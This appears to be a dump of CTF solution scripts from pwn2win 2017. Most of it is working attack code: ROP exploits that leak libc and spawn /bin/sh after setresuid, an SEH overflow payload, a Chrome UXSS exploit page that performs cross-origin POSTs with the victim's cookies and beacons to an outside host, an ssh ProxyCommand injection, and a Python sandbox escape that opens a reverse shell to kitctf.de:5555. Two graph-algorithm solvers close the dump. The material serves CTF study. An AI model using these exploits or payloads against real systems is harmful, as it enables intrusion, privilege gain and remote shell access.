pwn2win 2017 solution dump
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools
# Two-stage exploit for a non-PIE x86-64 binary.  Stage 1 overflows the
# "name?" buffer, overwrites the saved rbp and returns into a short chain that
# puts()-leaks a pointer stored at 0x600b98, flushes stdout and re-enters the
# vulnerable read path (0x400743).  Stage 2 uses the leak to rebase libc and
# runs setresuid(1337, 1337, 1337) followed by system("/bin/sh").
connect()
ru('name?\n')

# Fixed addresses inside the target binary (PLT stubs and gadgets).
pop_rdi = 0x004007f3
pop_rsi_r15 = 0x4007f1
puts = 0x400570
fflush = 0x4005d0
fgets = 0x4005b0
rbp = 0x600ba0

# Value of the leaked pointer and the libc base as observed in the local
# debugging session; their difference is the leaked symbol's libc offset.
# These, and every libc offset below, only hold for the target's libc build.
LEAK_ADDR_LOCAL = 0x7ffff7a7aad0
LIBC_BASE_LOCAL = 0x00007ffff7a0d000

stage1_words = [
    pop_rdi, 0x600b98,  # rdi = address of the pointer to leak
    puts,               # puts(*) -> prints the pointer's bytes
    pop_rdi, 0,
    fflush,             # fflush(NULL) so the leak is actually written out
    0x400743,           # back into the function that reads our input
]
stage1 = ''.join(p64(word) for word in stage1_words)
# The input is line-based: a newline inside the chain would truncate it.
assert '\n' not in stage1
sendln('a' * 32 + p64(rbp) + stage1)

# The last 6 bytes of the reply line are the raw little-endian pointer;
# pad with two NULs to make a full 8-byte word.
leak = u64(readln()[-6:] + '\0\0')
libc = leak - LEAK_ADDR_LOCAL + LIBC_BASE_LOCAL
info('libc @ %p', libc)

stage2_parts = [
    p64(0x424242424242),
    p64(0x400780),
    'F' * 16,
    p64(0x600ba0),
    p64(libc + 0x21102), p64(1337),               # pop rdi ; ret
    p64(libc + 0x000202e8), p64(1337),            # pop rsi ; ret
    p64(libc + 0x0001b92), p64(1337),             # pop rdx ; ret
    p64(libc + 0xcd570),                          # setresuid(1337, 1337, 1337)
    p64(libc + 0x21102), p64(libc + 0x18cd17),    # rdi = "/bin/sh" (in libc)
    p64(libc + 0x45390),                          # system
]
chain = ''.join(stage2_parts)
# Pad to exactly 0x400 bytes with filler (the read presumably consumes a
# fixed-size block).
stage2 = chain + 'G' * (0x400 - len(chain))
assert '\n' not in stage2
sendln(stage2)
interact()
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools
# Run until you get a shell. Should work in 1/16 tries (4 bits are guessed)
# 32-bit, non-PIE target: every address below is fixed for the binary.
pop3 = 0x080486ad    # presumably pop;pop;pop;ret - discards write()'s 3 args
store = 0x80484FB    # store primitive, called as store(addr, 0, val) (see write)
got = 0x8049900      # the single GOT slot the chain keeps re-pointing
plt = 0x80483A0      # PLT stub that presumably jumps through that slot
popebp = 0x08048510  # presumably pop ebp;ret - skips one argument slot
nl = 0x80486E1       # not used below

connect()
ru('Exit with ".".\n')
def write(addr, val):
    """Return the ROP slice that invokes the store gadget as store(addr, 0, val).

    `store` and `pop3` are the module-level addresses defined above; `pop3`
    (presumably pop;pop;pop;ret) removes the three argument slots so the
    chain continues with whatever follows this slice.
    """
    call = [store, pop3]
    args = [addr, 0, val]
    return call + args
# Every call goes through the one PLT stub `plt`, which resolves via the GOT
# slot `got`.  write(got-2, 0xXXXX4343) stores a dword two bytes before the
# slot: 0x4343 lands in the two bytes in front of it and 0xXXXX replaces the
# slot's low 16 bits.  Only 12 of those bits are fixed by the page offset, so
# the top nibble is a guess - hence the 1/16 success rate noted above.
rop = (
    write(got - 2, 0xd1404343)    # slot -> puts
    + [plt, popebp, got]          # puts(got): leak the slot's 4 raw bytes
    + write(got - 2, 0xb3304343)  # slot -> fflush
    + [plt, popebp, 0]            # fflush(NULL)
    + write(got - 2, 0xc8904343)  # slot -> gets
    + [plt, popebp, 0x80498c8]    # gets(buf): receives "/bin/sh;"
    + [plt, popebp, got]          # gets(got): receives &system
    + [plt, popebp, 0x80498c8]    # now system("/bin/sh;")
)

# The service takes each chain word as a signed 32-bit decimal at index 72+i.
for idx, word in enumerate(rop):
    signed = word - 2 ** 32 if word >= 2 ** 31 else word
    send('%d\n%d\n' % (72 + idx, signed))
sendln('.')

# puts() printed the patched slot: 4 raw bytes = puts' address in the
# target's libc.  The two constants come from the local debugging session.
libc = u32(readn(4)) - 0xf7e7d140 + 0xf7e1e000
if libc & 0xfff:
    exit(1)  # wrong nibble guessed (base not page-aligned) - rerun
info('libc %p', libc)
system = libc + 0x3a940
info('system %p', system)

sendln('/bin/sh;')    # consumed by gets(0x80498c8)
raw_input()           # manual pause between the two gets() inputs
sendln(p32(system))   # consumed by gets(got)
enjoy()
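import struct
import sys


def build_payload():
    """Return the fixed 0x200-byte overflow payload as bytes.

    Layout: 352 bytes of 'A' filler, the little-endian dword 0x8011798 (the
    value that lands on the overwritten slot - by the file name an SEH
    handler, which cannot be confirmed from here), then 'B' filler up to
    exactly 0x200 bytes.
    """
    payload = b'A' * 352
    payload += struct.pack("<I", 0x8011798)
    payload += b'B' * (0x200 - len(payload))
    return payload


if __name__ == '__main__':
    # The original wrote to sys.stdout without importing sys (NameError) and,
    # on Python 3, mixed str filler with the bytes from struct.pack.
    # Write raw bytes on both interpreters: sys.stdout.buffer on Python 3,
    # the text stdout on Python 2 where str already is bytes.
    getattr(sys.stdout, 'buffer', sys.stdout).write(build_payload())
# python2 seh.py | nc host port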
<!DOCTYPE html>
<!-- UXSS 1day in Chrome:
https://bugs.chromium.org/p/chromium/issues/detail?id=668552
-->
<!-- Exploit page for the Chrome bug linked above (a 1-day per the author).
     Victim origin: careers.butcher.team.  dtun.de is presumably the author's
     own server (it hosts s.svg, the stalling listener on :4444 and the /done/
     beacon).  The page must be served over HTTP: the script bails on file:. -->
<base href="javascript:top.f();//"></base>
<object name="privateScriptController"></object>
<object data="#"></object>
<script>
// file: URLs do not reproduce the bug; insist on a real origin.
if (location.protocol == 'file:') {
  throw alert('HTTP server is required.');
}
// Reached through the <base href="javascript:top.f();//"> element (the exact
// trigger path is part of the bug and not derivable from this file): drops
// the privateScriptController object and moves the prepared <div> c into
// the first frame's document.
function f() {
  document.getElementsByName('privateScriptController')[0].remove();
  frames[0].document.documentElement.appendChild(c);
}
// Build the DOM fragment inside a throw-away iframe's document, then adopt
// it into the top document.  The structure (div > marquee.a, iframe, iframe)
// is presumably part of the trigger - do not reorder.
var i = document.documentElement.appendChild(document.createElement('iframe'));
var d = i.contentDocument;
i.remove();
var c = d.documentElement.appendChild(d.createElement('div'));
var m = c.appendChild(d.createElement('marquee'));
var i0 = c.appendChild(d.createElement('iframe'));
var i1 = c.appendChild(d.createElement('iframe'));
m.setAttribute('class', 'a');
document.adoptNode(c);
// Script to run with the victim origin's privileges: fetch the curriculum
// listing, scrape the "accept" token out of it, POST it to /analysis/accept
// (a CSRF-style action with the victim's cookies), then hit dtun.de/done/
// as a completion beacon.  All requests are synchronous XHR (third arg false).
var code= (
'var x=new XMLHttpRequest();'+
'x.open("GET","http://careers.butcher.team/analysis/curriculums",false);'+
'x.send();'+
'var token=x.responseText.split("\'accept\',\'")[1].split("\'")[0];'+
'var y=new XMLHttpRequest();'+
'y.open("POST","http://careers.butcher.team/analysis/accept",false);'+
'y.setRequestHeader("Content-type", "application/json");'+
'y.send(JSON.stringify({token:token}));'+
'var z=new XMLHttpRequest();'+
'z.open("GET","http://dtun.de/done/",false);'+
'z.send();');
// Encode the script as a comma-separated list of char codes so it can be
// embedded in a javascript: URL without any quoting.  Note `i` is reused
// here; the discarded iframe above is never referenced again.
var payload = '';
for (var i = 0; i < code.length; ++i) {
  if (i>0) payload += ',';
  payload += code.charCodeAt(i);
}
console.log(payload);
// Once the cross-origin page has loaded, reading contentDocument is expected
// to throw (NOTE(review): current browsers return null instead of throwing,
// so this trigger may not fire as written - TODO confirm).  In that branch:
// navigate the victim frame to the javascript: payload, remove the <base>
// and load s.svg (served separately, see the comment at the bottom).
i1.onload = function() {
  try {
    i1.contentDocument;
  } catch(e) {
    i1.onload = null;
    i1.src = 'javascript:eval(String.fromCharCode('+payload+'))';
    document.querySelector('base').remove();
    document.documentElement.appendChild(document.createElement('iframe')).src = 's.svg';
  }
}
i1.src = 'http://careers.butcher.team/analysis/curriculums';
</script>
<!-- This one is to delay the load. the server must listen, but not give a response! -->
<img src="http://dtun.de:4444/"/>
<!-- Also serve /s.svg:
<svg xmlns="http://www.w3.org/2000/svg">
<iframe xmlns="http://www.w3.org/1999/xhtml"></iframe>
<script>
frames[0].onunload = function() {
frames[0].frameElement.appendChild(top.c);
}
</script>
<element a="1" a="2" />
</svg>
-->
4
ssh://-oProxyCommand=sh<&2 /a
ls -alih>&2
cat flag.txt>&2
from pwnlib.tools import * #https://github.com/niklasb/ctf-tools
# Drive the Python-sandbox challenge: a few menu inputs, then one line that
# walks object.__subclasses__() to reach a module that has `os` in its
# globals and spawns a reverse shell.
connect()
lines = [
    r'\D',
    r'Revoke',
    r'Op\en',
    r'gen eval(Option())',
    # catch_warnings.__enter__ -> its module globals -> linecache -> os.system.
    # Reverse shell to kitctf.de:5555 (presumably the author's listener);
    # point it at your own host before reusing.
    r'''raw_input([x for x in ().__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('/bin/bash -c "sh >/dev/tcp/kitctf.de/5555 <&1 2>&1"'))''',
]
for line in lines:
    sendln(line)
interact()
from sage.all import matrix, Integer, Rational
from scipy import linalg
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools
import ssl
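def effective_resistances(n, edges, queries):
    """Compute the effective resistance between each queried pair of nodes.

    n: number of nodes; node ids are 1-based (1..n).
    edges: dict {(x, y): [w, ...]} with x < y, 1-based.  Several weights on
        the same pair are resistors in parallel and combine to conductance
        sum(1/w).
    queries: iterable of (x, y) 1-based pairs.

    Returns a list of floats, one per query, in query order.  The resistance
    is H[x,x] + H[y,y] - H[x,y] - H[y,x] where H is the Moore-Penrose
    pseudoinverse of the graph Laplacian.

    Raises ValueError on a self-loop edge key.  A node id outside 1..n
    raises IndexError, as in the original.
    """
    L = [[0.0] * n for _ in range(n)]
    for (x, y), ws in edges.items():
        if x == y:
            raise ValueError('self-loop edge %r' % ((x, y),))
        conductance = sum(1.0 / w for w in ws)
        L[x - 1][y - 1] = L[y - 1][x - 1] = -conductance
    for i in range(n):
        L[i][i] = -sum(L[i])
    # Pseudoinverse rather than inverse: the Laplacian is singular.
    H = linalg.pinv(L)
    out = []
    for x, y in queries:
        a, b = x - 1, y - 1
        out.append(H[a, a] + H[b, b] - H[a, b] - H[b, a])
    return out


if __name__ == '__main__':
    # NOTE(review): ssl.wrap_socket() with no cert_reqs does not verify the
    # server certificate; acceptable for a CTF box, never for a real endpoint.
    s = ssl.wrap_socket(connect())
    while True:
        queries = []
        edges = {}
        n = 0
        while True:
            # list(map(...)) / comprehension: on Python 3 a bare map() is
            # always truthy and the blank-line terminator would be missed.
            ln = [int(tok) for tok in readln(s).split()]
            if not ln:
                break
            if len(ln) == 2:
                queries.append(ln)
                continue
            if queries:
                raise ValueError('edge line after the first query line')
            x, y = min(ln[:2]), max(ln[:2])
            if x == y:
                continue  # self-loops do not affect resistance
            n = max(n, x, y)
            edges.setdefault((x, y), []).append(ln[2])
        print("DONE READING %d %d %d" % (n, len(edges), len(queries)))
        for r in effective_resistances(n, edges, queries):
            sendln(s, '%.03f' % r)
    interact()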
from collections import defaultdict
import ssl
from pwnlib.tools import *
# TLS client socket to the challenge service.  ssl.wrap_socket() called with
# no cert_reqs does not verify the server certificate or hostname - fine
# against a CTF box, never for a real endpoint.
s=ssl.wrap_socket(connect())
# s=connect()
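def solve(n, edges, queries):
    """Answer maximum-bottleneck (widest-path) queries on an undirected graph.

    Edges are added heaviest first into a union-find; the moment an edge
    (x, y, w) joins two components, every node pair across them gets the
    answer w.  That is the weight of the edge that first connects the pair,
    i.e. the maximum over all paths of the minimum edge weight on the path.

    n: number of nodes, ids 0..n-1.
    edges: iterable of (x, y, w) triples (lists or tuples).
    queries: iterable of (x, y) pairs.

    Returns a list with one answer per query, in order.
    Raises ValueError for a duplicate undirected edge, a query with x == y,
    or a query on two nodes that never become connected.  (The original
    used assert for these, which -O strips.)
    """
    parent = list(range(n))
    # members[r] is the node list of the component rooted at r, valid only
    # while r is a root; replaces the recursive child-tree walk.
    members = [[i] for i in range(n)]

    def find(x):
        root = x
        while parent[root] != root:
            root = parent[root]
        # Path compression, iteratively (no recursion depth limit).
        while parent[x] != root:
            parent[x], x = root, parent[x]
        return root

    # Python-2-only tuple-parameter lambda replaced by plain indexing.
    heaviest_first = sorted(edges, key=lambda e: e[2], reverse=True)
    ans = [[-1] * n for _ in range(n)]
    seen = set()
    for x, y, w in heaviest_first:
        key = (min(x, y), max(x, y))
        if key in seen:
            raise ValueError('duplicate edge %r' % (key,))
        seen.add(key)
        rx, ry = find(x), find(y)
        if rx == ry:
            continue
        for a in members[rx]:
            for b in members[ry]:
                ans[a][b] = ans[b][a] = w
        parent[rx] = ry
        members[ry].extend(members[rx])
        members[rx] = []

    res = []
    for x, y in queries:
        if x == y:
            raise ValueError('query on a single node %r' % (x,))
        if ans[x][y] == -1:
            raise ValueError('nodes %r and %r are not connected' % (x, y))
        res.append(ans[x][y])
    return res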
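# Read one instance per round: edge lines "x y w" first, then query lines
# "x y", terminated by a blank line; answer every query with "%d.0".
# Fixes a stray `send` token after the `if len(ln)==2:` test (a syntax error
# as written) and the bare print statement / map() iterator that break on
# Python 3.
while True:
    queries = []
    edges = []
    n = 0
    while True:
        ln = readln(s)
        # A list, not a map() iterator: on Python 3 the latter is always
        # truthy and the blank-line terminator would never be detected.
        ln = [int(tok) for tok in ln.split()]
        if not ln:
            break
        # Node ids are 1-based on the wire, 0-based for solve().
        ln[0] -= 1
        ln[1] -= 1
        if ln[0] == ln[1]:
            raise ValueError('self-loop in input line %r' % (ln,))
        if len(ln) == 2:
            queries.append(ln)
        else:
            if queries:
                raise ValueError('edge line after the first query line')
            n = max(n, ln[0] + 1, ln[1] + 1)
            edges.append(ln)
    print("DONE READING %d %d %d" % (n, len(edges), len(queries)))
    res = solve(n, edges, queries)
    send(s, '\n'.join('%d.0' % a for a in res))
interact()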